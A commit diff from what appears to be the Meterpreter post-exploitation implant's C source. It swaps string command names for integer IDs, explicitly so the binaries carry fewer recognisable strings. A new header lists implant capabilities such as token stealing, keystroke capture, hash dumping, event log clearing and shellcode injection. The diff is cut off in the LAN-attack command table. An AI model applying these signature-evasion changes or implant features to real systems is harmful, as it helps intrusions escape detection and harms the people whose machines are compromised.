Remove method strings from TLV packets

We now use ints, and hopefully this means we don't have as much obvious
stuff in the binaries!

```
$ # Before:
$ strings metsrv.x86.dll | grep core_ | wc -l
46
$ # After:
$ strings metsrv.x86.dll | grep core_ | wc -l
0
```
Big win, and it's even bigger for the likes of stdapi.

Had to fix a bunch of other stuff along the way, including a subtle
issue with the Powershell Meterp bindings.

c/meterpreter/source/common/common.h

@@ -107,5 +107,6 @@ static _inline void real_dprintf(char *format, ...)
 #include "common_pivot_tree.h"
 #include "common_thread.h"
 #include "common_scheduler.h"
+#include "common_command_ids.h"
 
 #endif

c/meterpreter/source/common/common_base.h

@@ -26,33 +26,33 @@ typedef BOOL(*INLINE_DISPATCH_ROUTINE)(Remote *remote, Packet *packet, DWORD* re
 /*! @brief Helper macro which defines an empty dispatch handler. */
 #define EMPTY_DISPATCH_HANDLER NULL, NULL, EMPTY_TLV
 /*! @brief Helper macro that defines terminator for command lists. */
-#define COMMAND_TERMINATOR { NULL, { EMPTY_DISPATCH_HANDLER }, { EMPTY_DISPATCH_HANDLER } }
+#define COMMAND_TERMINATOR { 0, { EMPTY_DISPATCH_HANDLER }, { EMPTY_DISPATCH_HANDLER } }
 
 /*!
  * @brief Helper macro that defines a command instance with a request handler only.
  * @remarks The request handler will be executed on a separate thread.
  */
-#define COMMAND_REQ(name, reqHandler) { name, { reqHandler, NULL, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
+#define COMMAND_REQ(command_id, reqHandler) { command_id, { reqHandler, NULL, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
 /*!
  * @brief Helper macro that defines a command instance with a response handler only.
  * @remarks The request handler will be executed on a separate thread.
  */
-#define COMMAND_REP(name, repHandler) { name, { EMPTY_DISPATCH_HANDLER }, { repHandler, NULL, EMPTY_TLV } }
+#define COMMAND_REP(command_id, repHandler) { command_id, { EMPTY_DISPATCH_HANDLER }, { repHandler, NULL, EMPTY_TLV } }
 /*!
  * @brief Helper macro that defines a command instance with both a request and response handler.
  * @remarks The request handler will be executed on a separate thread.
  */
-#define COMMAND_REQ_REP(name, reqHandler, repHandler) { name, { reqHandler, NULL, EMPTY_TLV }, { repHandler, NULL, EMPTY_TLV } }
+#define COMMAND_REQ_REP(command_id, reqHandler, repHandler) { command_id, { reqHandler, NULL, EMPTY_TLV }, { repHandler, NULL, EMPTY_TLV } }
 /*!
  * @brief Helper macro that defines a command instance with an inline request handler only.
  * @remarks The request handler will be executed on the server thread.
  */
-#define COMMAND_INLINE_REQ(name, reqHandler) { name, { NULL, reqHandler, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
+#define COMMAND_INLINE_REQ(command_id, reqHandler) { command_id, { NULL, reqHandler, EMPTY_TLV }, { EMPTY_DISPATCH_HANDLER } }
 /*!
  * @brief Helper macro that defines a command instance with an inline response handler only.
  * @remarks The response handler will be executed on the server thread.
  */
-#define COMMAND_INLINE_REP(name, reqHandler) { name, { EMPTY_DISPATCH_HANDLER }, { NULL, reqHandler, EMPTY_TLV } }
+#define COMMAND_INLINE_REP(command_id, reqHandler) { command_id, { EMPTY_DISPATCH_HANDLER }, { NULL, reqHandler, EMPTY_TLV } }
 
 /*!
  * @brief Defines a command handler for requests and responses.
@@ -82,7 +82,7 @@ typedef struct
  */
 typedef struct command
 {
-	LPCSTR           method;     ///< Identifier for the command.
+	UINT             command_id; ///< Identifier for the command.
 	PacketDispatcher request;    ///< Defines the request handler.
 	PacketDispatcher response;   ///< Defines the response handler.
 

c/meterpreter/source/common/common_channel.h

@@ -18,24 +18,15 @@ typedef enum
 
 // Direct I/O handler -- used in place of internal buffering for channels
 // that can do event based forwarding of buffers.
-typedef DWORD (*DirectIoHandler)(struct _Channel *channel, 
+typedef DWORD (*DirectIoHandler)(struct _Channel *channel, struct _ChannelBuffer *buffer, LPVOID context, ChannelDioMode mode, PUCHAR chunk, ULONG length, PULONG bytesXfered);
-		struct _ChannelBuffer *buffer, LPVOID context, ChannelDioMode mode, 
-		PUCHAR chunk, ULONG length, PULONG bytesXfered);
 
 // Asynchronous completion routines -- used with channel_open, channel_read, 
 // etc.
-typedef DWORD (*ChannelOpenCompletionRoutine)(Remote *remote,
+typedef DWORD (*ChannelOpenCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result);
-		struct _Channel *channel, LPVOID context, DWORD result);
+typedef DWORD (*ChannelReadCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result, PUCHAR buffer, ULONG bytesRead);
-typedef DWORD (*ChannelReadCompletionRoutine)(Remote *remote,
+typedef DWORD (*ChannelWriteCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result, ULONG bytesWritten);
-		struct _Channel *channel, LPVOID context, DWORD result, PUCHAR buffer, 
+typedef DWORD (*ChannelCloseCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result);
-		ULONG bytesRead);
+typedef DWORD (*ChannelInteractCompletionRoutine)(Remote *remote, struct _Channel *channel, LPVOID context, DWORD result);
-typedef DWORD (*ChannelWriteCompletionRoutine)(Remote *remote,
-		struct _Channel *channel, LPVOID context, DWORD result, 
-		ULONG bytesWritten);
-typedef DWORD (*ChannelCloseCompletionRoutine)(Remote *remote,
-		struct _Channel *channel, LPVOID context, DWORD result);
-typedef DWORD (*ChannelInteractCompletionRoutine)(Remote *remote,
-		struct _Channel *channel, LPVOID context, DWORD result);
 
 // Completion routine wrapper context
 typedef struct _ChannelCompletionRoutine
@@ -69,13 +60,9 @@ typedef struct _ChannelBuffer
 typedef struct _NativeChannelOps
 {
 	LPVOID context;
-	DWORD (*write)(struct _Channel *channel, Packet *request,
+	DWORD (*write)(struct _Channel *channel, Packet *request, LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesWritten);
-			LPVOID context, LPVOID buffer, DWORD bufferSize,
+	DWORD (*close)(struct _Channel *channel, Packet *request, LPVOID context);
-			LPDWORD bytesWritten);
+	DWORD (*interact)(struct _Channel *channel, Packet *request, LPVOID context, BOOLEAN interact);
-	DWORD (*close)(struct _Channel *channel, Packet *request,
-			LPVOID context);
-	DWORD (*interact)(struct _Channel *channel, Packet *request,
-			LPVOID context, BOOLEAN interact);
 } NativeChannelOps;
 
 // Channel operations for a stream-based channel
@@ -94,15 +81,10 @@ typedef struct _DatagramChannelOps
 typedef struct _PoolChannelOps
 {
 	NativeChannelOps native;
-	DWORD (*read)(struct _Channel *channel, Packet *request,
+	DWORD (*read)(struct _Channel *channel, Packet *request, LPVOID context, LPVOID buffer, DWORD bufferSize, LPDWORD bytesRead);
-			LPVOID context, LPVOID buffer, DWORD bufferSize,
+	DWORD (*eof)(struct _Channel *channel, Packet *request, LPVOID context, LPBOOL isEof);
-			LPDWORD bytesRead);
+	DWORD (*seek)(struct _Channel *channel, Packet *request, LPVOID context, LONG offset, DWORD whence);
-	DWORD (*eof)(struct _Channel *channel, Packet *request,
+	DWORD (*tell)(struct _Channel *channel, Packet *request, LPVOID context, LPLONG offset);
-			LPVOID context, LPBOOL isEof);
-	DWORD (*seek)(struct _Channel *channel, Packet *request,
-			LPVOID context, LONG offset, DWORD whence);
-	DWORD (*tell)(struct _Channel *channel, Packet *request,
-			LPVOID context, LPLONG offset);
 } PoolChannelOps;
 
 /*

c/meterpreter/source/common/common_command_ids.h

@@ -0,0 +1,214 @@
+/*!
+ * @file common_command_ids.h
+ * @brief Declarations of command ID values
+ * @description This file was generated 2020-04-27 03:59:19 UTC. Do not modify directly.
+ */
+#ifndef _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H
+#define _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H
+
+#define COMMAND_ID_CORE_CHANNEL_CLOSE 1
+#define COMMAND_ID_CORE_CHANNEL_EOF 2
+#define COMMAND_ID_CORE_CHANNEL_INTERACT 3
+#define COMMAND_ID_CORE_CHANNEL_OPEN 4
+#define COMMAND_ID_CORE_CHANNEL_READ 5
+#define COMMAND_ID_CORE_CHANNEL_SEEK 6
+#define COMMAND_ID_CORE_CHANNEL_TELL 7
+#define COMMAND_ID_CORE_CHANNEL_WRITE 8
+#define COMMAND_ID_CORE_CONSOLE_WRITE 9
+#define COMMAND_ID_CORE_ENUMEXTCMD 10
+#define COMMAND_ID_CORE_GET_SESSION_GUID 11
+#define COMMAND_ID_CORE_LOADLIB 12
+#define COMMAND_ID_CORE_MACHINE_ID 13
+#define COMMAND_ID_CORE_MIGRATE 14
+#define COMMAND_ID_CORE_NATIVE_ARCH 15
+#define COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION 16
+#define COMMAND_ID_CORE_PATCH_URL 17
+#define COMMAND_ID_CORE_PIVOT_ADD 18
+#define COMMAND_ID_CORE_PIVOT_REMOVE 19
+#define COMMAND_ID_CORE_PIVOT_SESSION_DIED 20
+#define COMMAND_ID_CORE_SET_SESSION_GUID 21
+#define COMMAND_ID_CORE_SET_UUID 22
+#define COMMAND_ID_CORE_SHUTDOWN 23
+#define COMMAND_ID_CORE_TRANSPORT_ADD 24
+#define COMMAND_ID_CORE_TRANSPORT_CHANGE 25
+#define COMMAND_ID_CORE_TRANSPORT_GETCERTHASH 26
+#define COMMAND_ID_CORE_TRANSPORT_LIST 27
+#define COMMAND_ID_CORE_TRANSPORT_NEXT 28
+#define COMMAND_ID_CORE_TRANSPORT_PREV 29
+#define COMMAND_ID_CORE_TRANSPORT_REMOVE 30
+#define COMMAND_ID_CORE_TRANSPORT_SETCERTHASH 31
+#define COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS 32
+#define COMMAND_ID_CORE_TRANSPORT_SLEEP 33
+#define COMMAND_ID_STDAPI_FS_CHDIR 1001
+#define COMMAND_ID_STDAPI_FS_CHMOD 1002
+#define COMMAND_ID_STDAPI_FS_DELETE_DIR 1003
+#define COMMAND_ID_STDAPI_FS_DELETE_FILE 1004
+#define COMMAND_ID_STDAPI_FS_FILE_COPY 1005
+#define COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH 1006
+#define COMMAND_ID_STDAPI_FS_FILE_MOVE 1007
+#define COMMAND_ID_STDAPI_FS_GETWD 1008
+#define COMMAND_ID_STDAPI_FS_LS 1009
+#define COMMAND_ID_STDAPI_FS_MD5 1010
+#define COMMAND_ID_STDAPI_FS_MKDIR 1011
+#define COMMAND_ID_STDAPI_FS_MOUNT_SHOW 1012
+#define COMMAND_ID_STDAPI_FS_SEARCH 1013
+#define COMMAND_ID_STDAPI_FS_SEPARATOR 1014
+#define COMMAND_ID_STDAPI_FS_SHA1 1015
+#define COMMAND_ID_STDAPI_FS_STAT 1016
+#define COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE 1017
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE 1018
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES 1019
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT 1020
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY 1021
+#define COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES 1022
+#define COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE 1023
+#define COMMAND_ID_STDAPI_NET_RESOLVE_HOST 1024
+#define COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS 1025
+#define COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN 1026
+#define COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN 1027
+#define COMMAND_ID_STDAPI_RAILGUN_API 1028
+#define COMMAND_ID_STDAPI_RAILGUN_API_MULTI 1029
+#define COMMAND_ID_STDAPI_RAILGUN_MEMREAD 1030
+#define COMMAND_ID_STDAPI_RAILGUN_MEMWRITE 1031
+#define COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS 1032
+#define COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY 1033
+#define COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY 1034
+#define COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY 1035
+#define COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE 1036
+#define COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY 1037
+#define COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT 1038
+#define COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE 1039
+#define COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT 1040
+#define COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY 1041
+#define COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY 1042
+#define COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY 1043
+#define COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS 1044
+#define COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE 1045
+#define COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT 1046
+#define COMMAND_ID_STDAPI_REGISTRY_SET_VALUE 1047
+#define COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT 1048
+#define COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY 1049
+#define COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST 1050
+#define COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN 1051
+#define COMMAND_ID_STDAPI_SYS_CONFIG_GETENV 1052
+#define COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS 1053
+#define COMMAND_ID_STDAPI_SYS_CONFIG_GETSID 1054
+#define COMMAND_ID_STDAPI_SYS_CONFIG_GETUID 1055
+#define COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME 1056
+#define COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF 1057
+#define COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN 1058
+#define COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO 1059
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR 1060
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE 1061
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS 1062
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST 1063
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN 1064
+#define COMMAND_ID_STDAPI_SYS_EVENTLOG_READ 1065
+#define COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS 1066
+#define COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH 1067
+#define COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE 1068
+#define COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE 1069
+#define COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO 1070
+#define COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES 1071
+#define COMMAND_ID_STDAPI_SYS_PROCESS_GETPID 1072
+#define COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES 1073
+#define COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS 1074
+#define COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD 1075
+#define COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD 1076
+#define COMMAND_ID_STDAPI_SYS_PROCESS_KILL 1077
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE 1078
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE 1079
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK 1080
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT 1081
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY 1082
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ 1083
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK 1084
+#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE 1085
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE 1086
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE 1087
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS 1088
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN 1089
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS 1090
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME 1091
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS 1092
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND 1093
+#define COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE 1094
+#define COMMAND_ID_STDAPI_SYS_PROCESS_WAIT 1095
+#define COMMAND_ID_STDAPI_UI_DESKTOP_ENUM 1096
+#define COMMAND_ID_STDAPI_UI_DESKTOP_GET 1097
+#define COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT 1098
+#define COMMAND_ID_STDAPI_UI_DESKTOP_SET 1099
+#define COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD 1100
+#define COMMAND_ID_STDAPI_UI_ENABLE_MOUSE 1101
+#define COMMAND_ID_STDAPI_UI_GET_IDLE_TIME 1102
+#define COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8 1103
+#define COMMAND_ID_STDAPI_UI_SEND_KEYEVENT 1104
+#define COMMAND_ID_STDAPI_UI_SEND_KEYS 1105
+#define COMMAND_ID_STDAPI_UI_SEND_MOUSE 1106
+#define COMMAND_ID_STDAPI_UI_START_KEYSCAN 1107
+#define COMMAND_ID_STDAPI_UI_STOP_KEYSCAN 1108
+#define COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP 1109
+#define COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD 1110
+#define COMMAND_ID_STDAPI_WEBCAM_GET_FRAME 1111
+#define COMMAND_ID_STDAPI_WEBCAM_LIST 1112
+#define COMMAND_ID_STDAPI_WEBCAM_START 1113
+#define COMMAND_ID_STDAPI_WEBCAM_STOP 1114
+#define COMMAND_ID_PRIV_ELEVATE_GETSYSTEM 2001
+#define COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE 2002
+#define COMMAND_ID_PRIV_FS_BLANK_FILE_MACE 2003
+#define COMMAND_ID_PRIV_FS_GET_FILE_MACE 2004
+#define COMMAND_ID_PRIV_FS_SET_FILE_MACE 2005
+#define COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE 2006
+#define COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES 2007
+#define COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY 3001
+#define COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA 3002
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP 3003
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE 3004
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE 3005
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME 3006
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START 3007
+#define COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP 3008
+#define COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA 3009
+#define COMMAND_ID_EXTAPI_NTDS_PARSE 3010
+#define COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY 3011
+#define COMMAND_ID_EXTAPI_SERVICE_CONTROL 3012
+#define COMMAND_ID_EXTAPI_SERVICE_ENUM 3013
+#define COMMAND_ID_EXTAPI_SERVICE_QUERY 3014
+#define COMMAND_ID_EXTAPI_WINDOW_ENUM 3015
+#define COMMAND_ID_EXTAPI_WMI_QUERY 3016
+#define COMMAND_ID_SNIFFER_CAPTURE_DUMP 4001
+#define COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ 4002
+#define COMMAND_ID_SNIFFER_CAPTURE_RELEASE 4003
+#define COMMAND_ID_SNIFFER_CAPTURE_START 4004
+#define COMMAND_ID_SNIFFER_CAPTURE_STATS 4005
+#define COMMAND_ID_SNIFFER_CAPTURE_STOP 4006
+#define COMMAND_ID_SNIFFER_INTERFACES 4007
+#define COMMAND_ID_WINPMEM_DUMP_RAM 7001
+#define COMMAND_ID_KIWI_EXEC_CMD 8001
+#define COMMAND_ID_UNHOOK_PE 10001
+#define COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN 11001
+#define COMMAND_ID_INCOGNITO_ADD_GROUP_USER 12001
+#define COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER 12002
+#define COMMAND_ID_INCOGNITO_ADD_USER 12003
+#define COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN 12004
+#define COMMAND_ID_INCOGNITO_LIST_TOKENS 12005
+#define COMMAND_ID_INCOGNITO_SNARF_HASHES 12006
+#define COMMAND_ID_PYTHON_EXECUTE 13001
+#define COMMAND_ID_PYTHON_RESET 13002
+#define COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD 14001
+#define COMMAND_ID_POWERSHELL_EXECUTE 14002
+#define COMMAND_ID_POWERSHELL_SESSION_REMOVE 14003
+#define COMMAND_ID_POWERSHELL_SHELL 14004
+#define COMMAND_ID_LANATTACKS_ADD_TFTP_FILE 15001
+#define COMMAND_ID_LANATTACKS_DHCP_LOG 15002
+#define COMMAND_ID_LANATTACKS_RESET_DHCP 15003
+#define COMMAND_ID_LANATTACKS_RESET_TFTP 15004
+#define COMMAND_ID_LANATTACKS_SET_DHCP_OPTION 15005
+#define COMMAND_ID_LANATTACKS_START_DHCP 15006
+#define COMMAND_ID_LANATTACKS_START_TFTP 15007
+#define COMMAND_ID_LANATTACKS_STOP_DHCP 15008
+#define COMMAND_ID_LANATTACKS_STOP_TFTP 15009
+#define COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE 16001
+#define COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND 17001
+
+#endif

c/meterpreter/source/common/common_core.h

@@ -99,7 +99,7 @@ typedef DWORD TlvMetaType;
 typedef enum
 {
 	TLV_TYPE_ANY                 = TLV_VALUE(TLV_META_TYPE_NONE,        0),   ///! Represents an undefined/arbitrary value.
-	TLV_TYPE_METHOD              = TLV_VALUE(TLV_META_TYPE_STRING,      1),   ///! Represents a method/function name value.
+	TLV_TYPE_COMMAND_ID          = TLV_VALUE(TLV_META_TYPE_UINT,        1),   ///! Represents a command identifier.
 	TLV_TYPE_REQUEST_ID          = TLV_VALUE(TLV_META_TYPE_STRING,      2),   ///! Represents a request identifier value.
 	TLV_TYPE_EXCEPTION           = TLV_VALUE(TLV_META_TYPE_GROUP,       3),   ///! Represents an exception value.
 	TLV_TYPE_RESULT              = TLV_VALUE(TLV_META_TYPE_UINT,        4),   ///! Represents a result value.
@@ -234,7 +234,7 @@ typedef struct _DECOMPRESSED_BUFFER
 
 /*! * @brief Packet request completion notification handler function pointer type. */
 typedef DWORD (*PacketRequestCompletionRoutine)(Remote *remote,
-		Packet *response, LPVOID context, LPCSTR method, DWORD result);
+		Packet *response, LPVOID context, UINT commandId, DWORD result);
 
 typedef struct _PacketRequestCompletion
 {

c/meterpreter/source/common/common_metapi.h

@@ -117,7 +117,7 @@ typedef struct _PacketApi
 	DWORD(*transmit_empty_response)(Remote* remote, Packet* packet, DWORD res);
 	DWORD(*transmit_response)(DWORD result, Remote* remote, Packet* response);
 	PCHAR(*get_tlv_value_string)(Packet* packet, TlvType type);
-	Packet*(*create)(PacketTlvType type, LPCSTR method);
+	Packet*(*create)(PacketTlvType type, UINT commandId);
 	Packet*(*create_group)();
 	Packet*(*create_response)(Packet* request);
 	PacketTlvType(*get_type)(Packet* packet);

c/meterpreter/source/extensions/espia/espia.c

@@ -14,8 +14,8 @@ MetApi* met_api = NULL;
 
 Command customCommands[] =
 {
-	COMMAND_REQ( "espia_image_get_dev_screen", request_image_get_dev_screen ),
+    COMMAND_REQ(COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN, request_image_get_dev_screen),
-	COMMAND_TERMINATOR
+    COMMAND_TERMINATOR
 };
 
 /*!

c/meterpreter/source/extensions/extapi/extapi.c

@@ -22,22 +22,22 @@ MetApi* met_api = NULL;
 /*! @brief List of commands that the extended API extension providers. */
 Command customCommands[] =
 {
-	COMMAND_REQ("extapi_window_enum", request_window_enum),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_WINDOW_ENUM, request_window_enum),
-	COMMAND_REQ("extapi_service_enum", request_service_enum),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_SERVICE_ENUM, request_service_enum),
-	COMMAND_REQ("extapi_service_query", request_service_query),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_SERVICE_QUERY, request_service_query),
-	COMMAND_REQ("extapi_service_control", request_service_control),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_SERVICE_CONTROL, request_service_control),
-	COMMAND_REQ("extapi_clipboard_get_data", request_clipboard_get_data),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA, request_clipboard_get_data),
-	COMMAND_REQ("extapi_clipboard_set_data", request_clipboard_set_data),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA, request_clipboard_set_data),
-	COMMAND_REQ("extapi_clipboard_monitor_start", request_clipboard_monitor_start),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START, request_clipboard_monitor_start),
-	COMMAND_REQ("extapi_clipboard_monitor_pause", request_clipboard_monitor_pause),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE, request_clipboard_monitor_pause),
-	COMMAND_REQ("extapi_clipboard_monitor_resume", request_clipboard_monitor_resume),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME, request_clipboard_monitor_resume),
-	COMMAND_REQ("extapi_clipboard_monitor_purge", request_clipboard_monitor_purge),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE, request_clipboard_monitor_purge),
-	COMMAND_REQ("extapi_clipboard_monitor_stop", request_clipboard_monitor_stop),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP, request_clipboard_monitor_stop),
-	COMMAND_REQ("extapi_clipboard_monitor_dump", request_clipboard_monitor_dump),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP, request_clipboard_monitor_dump),
-	COMMAND_REQ("extapi_adsi_domain_query", request_adsi_domain_query),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY, request_adsi_domain_query),
-	COMMAND_REQ("extapi_ntds_parse", ntds_parse),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_NTDS_PARSE, ntds_parse),
-	COMMAND_REQ("extapi_wmi_query", request_wmi_query),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_WMI_QUERY, request_wmi_query),
-	COMMAND_REQ("extapi_pageant_send_query", request_pageant_send_query),
+	COMMAND_REQ(COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY, request_pageant_send_query),
 	COMMAND_TERMINATOR
 };
 

c/meterpreter/source/extensions/incognito/incognito.c

@@ -203,12 +203,12 @@ cleanup:
 
 Command customCommands[] =
 {
-	COMMAND_REQ( "incognito_list_tokens", request_incognito_list_tokens ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_LIST_TOKENS, request_incognito_list_tokens ),
-	COMMAND_REQ( "incognito_impersonate_token", request_incognito_impersonate_token ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN, request_incognito_impersonate_token ),
-	COMMAND_REQ( "incognito_add_user", request_incognito_add_user ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_ADD_USER, request_incognito_add_user ),
-	COMMAND_REQ( "incognito_add_group_user", request_incognito_add_group_user ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_ADD_GROUP_USER, request_incognito_add_group_user ),
-	COMMAND_REQ( "incognito_add_localgroup_user", request_incognito_add_localgroup_user ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER, request_incognito_add_localgroup_user ),
-	COMMAND_REQ( "incognito_snarf_hashes", request_incognito_snarf_hashes ),
+	COMMAND_REQ( COMMAND_ID_INCOGNITO_SNARF_HASHES, request_incognito_snarf_hashes ),
 	COMMAND_TERMINATOR
 };
 

c/meterpreter/source/extensions/kiwi/main.c

@@ -26,7 +26,7 @@ DWORD request_kerberos_ticket_use(Remote *remote, Packet *packet);
 /*! @brief The enabled commands for this extension. */
 Command customCommands[] =
 {
-    COMMAND_REQ("kiwi_exec_cmd", request_exec_cmd),
+    COMMAND_REQ(COMMAND_ID_KIWI_EXEC_CMD, request_exec_cmd),
     COMMAND_TERMINATOR
 };
 

c/meterpreter/source/extensions/lanattacks/lanattacks.c

@@ -160,15 +160,15 @@ DWORD request_lanattacks_stop_tftp(Remote *remote, Packet *packet)
 
 Command customCommands[] =
 {
-	COMMAND_REQ("lanattacks_start_dhcp", request_lanattacks_start_dhcp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_START_DHCP, request_lanattacks_start_dhcp),
-	COMMAND_REQ("lanattacks_reset_dhcp", request_lanattacks_reset_dhcp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_RESET_DHCP, request_lanattacks_reset_dhcp),
-	COMMAND_REQ("lanattacks_set_dhcp_option", request_lanattacks_set_dhcp_option),
